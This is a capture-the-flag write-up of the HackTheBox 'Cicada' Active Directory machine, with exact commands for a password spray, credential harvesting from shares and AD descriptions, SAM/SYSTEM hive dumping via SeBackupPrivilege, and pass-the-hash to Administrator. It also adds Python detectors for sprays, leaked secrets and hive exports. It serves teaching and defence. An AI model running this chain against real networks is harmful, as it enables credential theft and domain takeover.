Cicada Writeup

0x5t
Security Researcher
Team: RaptX
Joined: 2024
Tags: HackTheBox, Windows, Active Directory, SMB

Synopsis

Cicada is an easy Active Directory Windows machine that demonstrates a classic domain compromise chain: enumerating exposed SMB shares, retrieving default credentials from onboarding documentation, enumerating domain users, performing a password spray, collecting additional plaintext credentials from Active Directory user attributes and scripts in shared folders, and finally abusing the SeBackupPrivilege to dump and crack NTLM hashes, enabling a Pass-the-Hash attack to gain full administrative access.

Pre-Reqs

  • Access to the HackTheBox network
  • Common penetration testing tools:
      • nmap
      • crackmapexec
      • impacket suite
      • smbclient
      • evil-winrm
  • Familiarity with Active Directory concepts

Skills Required

  • Windows enumeration
  • SMB share navigation
  • Active Directory enumeration
  • Basic password spraying methodology

Skills Learned

  • Identifying and abusing weak share permissions
  • Extracting credentials from files and AD description fields
  • Performing low-noise password sprays
  • Abusing SeBackupPrivilege to extract registry hives
  • Using NTLM hashes for Pass-the-Hash authentication

Enumeration

Nmap Scan

Ports discovered:

53/tcp   domain
88/tcp   kerberos-sec
135/tcp  msrpc
139/tcp  netbios-ssn
389/tcp  ldap
445/tcp  microsoft-ds
464/tcp  kpasswd5
593/tcp  ncacn_http
636/tcp  ssl/ldap
3268/tcp ldap
3269/tcp ssl/ldap

Nmap Command

nmap -sC -sV -Pn 10.10.10.10

The results reveal a Windows Server 2022 Domain Controller named CICADA-DC within the cicada.htb domain. Multiple LDAP and Kerberos ports confirm this is an Active Directory environment.

echo "10.10.10.10 cicada.htb" | sudo tee -a /etc/hosts

This maps the domain name to the target IP for tools that require domain context.


SMB Enumeration

Check for anonymous share access:

crackmapexec smb cicada.htb --shares

No shares are accessible anonymously. Try the built-in guest account with a blank password:

crackmapexec smb cicada.htb -u 'guest' -p '' --shares

Output shows that the HR share is readable by guest.

Access the share:

smbclient //cicada.htb/HR

List files:

smb: \> dir
Notice from HR.txt

Download and read Notice from HR.txt:

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

A default password for new hires is now available for testing.


Foothold

Enumerating Domain Users

Use impacket-lookupsid over the guest session to enumerate domain usernames:

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt

Example entries:

Administrator
Guest
krbtgt
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Password Spraying

Test the default password against all enumerated accounts:

crackmapexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Result:

cicada.htb\michael.wrightson : Cicada$M6Corpb*@Lp#nZp!8

We have valid credentials for michael.wrightson.
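From the blue-team side, the spray above leaves a very recognisable trace in the Domain Controller's Security log: one source address producing 4625 failures against many different accounts within seconds, and a 4624 success from that same source for whichever account was using the default password. The following is an added Python example, not code from this writeup; the event records, their field names and the 10.10.14.5 / 10.10.20.7 addresses are constructed for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records (4625 = failed logon, 4624 = successful
# logon), reduced to the fields the rule needs. The first burst mimics the
# spray in this writeup; the 10.10.20.7 entries are one user mistyping a
# password twice and then getting it right, which must not alert.
EVENTS = [
    {"time": "2024-09-28T10:00:01", "id": 4625, "user": "john.smoulder",     "src": "10.10.14.5"},
    {"time": "2024-09-28T10:00:02", "id": 4625, "user": "sarah.dantelia",    "src": "10.10.14.5"},
    {"time": "2024-09-28T10:00:03", "id": 4624, "user": "michael.wrightson", "src": "10.10.14.5"},
    {"time": "2024-09-28T10:00:04", "id": 4625, "user": "david.orelious",    "src": "10.10.14.5"},
    {"time": "2024-09-28T10:00:05", "id": 4625, "user": "emily.oscars",      "src": "10.10.14.5"},
    {"time": "2024-09-28T10:05:00", "id": 4625, "user": "sarah.dantelia",    "src": "10.10.20.7"},
    {"time": "2024-09-28T10:05:10", "id": 4625, "user": "sarah.dantelia",    "src": "10.10.20.7"},
    {"time": "2024-09-28T10:05:20", "id": 4624, "user": "sarah.dantelia",    "src": "10.10.20.7"},
]


def detect_spray(events, window=timedelta(minutes=5), min_users=3):
    """One alert per source that fails against at least `min_users` distinct
    accounts inside `window`. The alert also lists accounts that logged on
    successfully from that source in the same window: the spray's hits."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(dict(e, ts=datetime.fromisoformat(e["time"])))

    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        best = None
        # Slide a window starting at each event; keep the widest spread seen
        # so a source yields a single alert rather than one per event.
        for i, start in enumerate(evs):
            in_win = [e for e in evs[i:] if e["ts"] - start["ts"] <= window]
            failed = {e["user"] for e in in_win if e["id"] == 4625}
            if len(failed) >= min_users and (best is None or len(failed) > len(best["failed"])):
                best = {
                    "src": src,
                    "window_start": start["ts"].isoformat(),
                    "failed": failed,
                    "successes": {e["user"] for e in in_win if e["id"] == 4624},
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_spray(EVENTS):
        print(f"spray from {a['src']} at {a['window_start']}: "
              f"{len(a['failed'])} accounts failed, hits={sorted(a['successes'])}")
```

The thresholds are the tuning knobs: a 5-minute window with three distinct accounts catches the one-shot spray shown here, but a deliberately slow spray spread over hours will slip through it, so the same logic should also be run over a longer window (an hour or a day) with a higher account count.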


Lateral Movement

Enumerating with Michael's Account

List all users and check AD description fields:

crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

The output shows that david.orelious has this password in his account's description field:

aRt$Lp#7t*VQ!3

Accessing DEV Share with David's Credentials

smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'

List contents:

Backup_script.ps1

Download and read the script. It contains hardcoded credentials for another user:

emily.oscars : Q!3@Lp#M6b*7t*Vt
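Both leaks in this chain, the password sitting in an AD description attribute and the one hard-coded in Backup_script.ps1, are what a periodic secrets audit over directory attributes and share contents should catch before anyone else does. Below is an added Python example, not code from this writeup: the user descriptions, the script body and the sarah.dantelia sample are constructed, and the only inputs it needs are (source, text) pairs such as those produced by exporting user descriptions and pulling scripts off shares. It applies three rules: a credential keyword followed by a value, PowerShell's ConvertTo-SecureString ... -AsPlainText idiom, and a fallback for long tokens that mix all four character classes.

```python
import re

# Rule 1: a credential keyword ("password", "passwd", "pwd", "secret")
# followed by "is", ":" or "=" and a value.
KEYWORD = re.compile(r"\b(?:pass(?:word|wd)?|pwd|secret)\b\s*(?:is|[:=])\s*\S+", re.I)
# Rule 2: the usual way a PowerShell script embeds a plaintext password.
SECURESTRING = re.compile(r"ConvertTo-SecureString\s+[\"']([^\"']+)[\"']\s+-AsPlainText", re.I)

# Constructed inputs: three AD user descriptions and one script from a share.
SAMPLES = [
    ("user:john.smoulder/description", "Sales team, started 2021"),
    ("user:david.orelious/description", "Reminder for David: password is aRt$Lp#7t*VQ!3"),
    ("user:sarah.dantelia/description", "vpn login Sd!9x#Kq2Lmz7 - remove after onboarding"),
    ("share:DEV/Backup_script.ps1",
     '$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force\n'
     '$cred = New-Object System.Management.Automation.PSCredential("emily.oscars", $password)\n'),
]


def looks_like_password(token, min_len=10):
    """Rule 3 heuristic: a long token using lower, upper, digit and symbol
    characters. Requiring all four classes keeps identifiers such as
    'ConvertTo-SecureString' (no digit) from triggering."""
    return (len(token) >= min_len
            and re.search(r"[a-z]", token) is not None
            and re.search(r"[A-Z]", token) is not None
            and re.search(r"\d", token) is not None
            and re.search(r"[^A-Za-z0-9]", token) is not None)


def scan(samples):
    """Return one finding dict per rule hit: source, rule name and the
    matched evidence. Tokens already covered by rule 1 or 2 are not
    reported a second time by rule 3."""
    findings = []
    for source, text in samples:
        for m in KEYWORD.finditer(text):
            findings.append({"source": source, "rule": "keyword", "evidence": m.group(0)})
        for m in SECURESTRING.finditer(text):
            findings.append({"source": source, "rule": "securestring", "evidence": m.group(1)})
        for tok in re.split(r"[\s\"'(),;]+", text):
            already = any(tok in f["evidence"] for f in findings if f["source"] == source)
            if looks_like_password(tok) and not already:
                findings.append({"source": source, "rule": "complex-token", "evidence": tok})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLES):
        print(f"{f['source']}: [{f['rule']}] {f['evidence']}")
```

Rule 3 will produce false positives on things like licence keys or hashes, so treat its hits as review items rather than alerts; rules 1 and 2 are precise enough to fail a build or raise a ticket on their own.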

WinRM Access as Emily

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb

This provides a shell as Emily. Retrieve the user.txt flag from her desktop.


Privilege Escalation

Checking Privileges

whoami /priv

Emily has:

SeBackupPrivilege    Enabled
SeRestorePrivilege   Enabled

SeBackupPrivilege allows bypassing file ACLs for reading system-protected files such as the SAM and SYSTEM registry hives.


Dumping Registry Hives

reg save hklm\sam sam
reg save hklm\system system

Download both:

download sam
download system
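Exporting hives with reg.exe is loud in process-creation telemetry, provided command-line logging is on (Sysmon Event ID 1 records it by default; Security 4688 only does so once the "Include command line in process creation events" policy is enabled). The following is an added Python example, not code from this writeup; the process records are constructed in that event shape. It flags a reg save or reg export of SAM, SYSTEM or SECURITY regardless of casing, quoting, HKLM versus HKEY_LOCAL_MACHINE spelling, a targeted subkey, or reg being launched through cmd /c.

```python
import ntpath
import re

# Hives whose export hands over credential material: local account hashes
# (SAM), the boot key needed to decrypt them (SYSTEM) and LSA secrets /
# cached credentials (SECURITY).
SENSITIVE_HIVES = ("hklm\\sam", "hklm\\system", "hklm\\security")

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688
# shape); none of these are real log lines from the box.
PROCESS_EVENTS = [
    {"user": "CICADA\\emily.oscars", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg save hklm\\sam sam"},
    {"user": "CICADA\\emily.oscars", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "\"C:\\Windows\\System32\\reg.exe\"  SAVE  HKEY_LOCAL_MACHINE\\SYSTEM\\ C:\\Temp\\system"},
    {"user": "CICADA\\svc_backup", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg export HKLM\\Software\\Contoso C:\\backup\\contoso.reg"},
    {"user": "CICADA\\helpdesk", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time"},
    {"user": "CICADA\\emily.oscars", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd /c reg save hklm\\security sec"},
]


def normalize_key(path):
    """Lower-case, unquote, unify slashes and the HKEY_LOCAL_MACHINE alias."""
    key = path.strip('"').lower().replace("/", "\\").rstrip("\\")
    return re.sub(r"^hkey_local_machine", "hklm", key)


def is_sensitive(key):
    """True for a sensitive hive or any subkey beneath it."""
    return any(key == h or key.startswith(h + "\\") for h in SENSITIVE_HIVES)


def detect_hive_export(events):
    """Scan each command line for 'reg <save|export> <key>' and report the
    ones targeting a sensitive hive. Scanning tokens rather than trusting
    the image path also catches reg launched via cmd /c."""
    hits = []
    for e in events:
        args = re.findall(r'"[^"]*"|\S+', e["cmdline"])
        for j in range(len(args) - 2):
            prog = ntpath.basename(args[j].strip('"')).lower()
            if prog not in ("reg", "reg.exe"):
                continue
            verb = args[j + 1].lower()
            if verb not in ("save", "export"):
                continue
            key = normalize_key(args[j + 2])
            if is_sensitive(key):
                hits.append({"user": e["user"], "verb": verb, "hive": key, "cmdline": e["cmdline"]})
    return hits


if __name__ == "__main__":
    for h in detect_hive_export(PROCESS_EVENTS):
        print(f"{h['user']} ran reg {h['verb']} on {h['hive']}: {h['cmdline']}")
```

Legitimate backup software may export SYSTEM on a schedule, so baseline the rule against the approved backup accounts and hosts; an export by an ordinary user account such as emily.oscars is the case worth paging on, and it points back at the real fix, which is not granting SeBackupPrivilege (Backup Operators membership) to accounts that do not need it.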

Extracting NTLM Hashes

impacket-secretsdump -sam sam -system system local

Administrator NTLM hash found:

2b87e7c93a3e8a0ea4a581937016f341

Pass-the-Hash to Administrator

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb

We now have a shell as Administrator.


Root Flag

cat C:\Users\Administrator\Desktop\root.txt

The root flag is retrieved successfully.


Summary

  1. Enumerated SMB shares as guest and found default password in HR share.
  2. Enumerated domain users with lookupsid.
  3. Password sprayed default credential; obtained access as michael.wrightson.
  4. Found david.orelious credentials in AD description field.
  5. Accessed DEV share; discovered emily.oscars credentials in a backup script.
  6. Logged in as Emily via WinRM.
  7. Used SeBackupPrivilege to dump SAM and SYSTEM hives.
  8. Extracted Administrator NTLM hash and performed Pass-the-Hash for full control.

Lessons Learned:

  • Weak share permissions can leak sensitive information.
  • Default credentials remain a major vulnerability.
  • AD description fields should never contain passwords.
  • SeBackupPrivilege is dangerous when assigned to non-admin accounts.
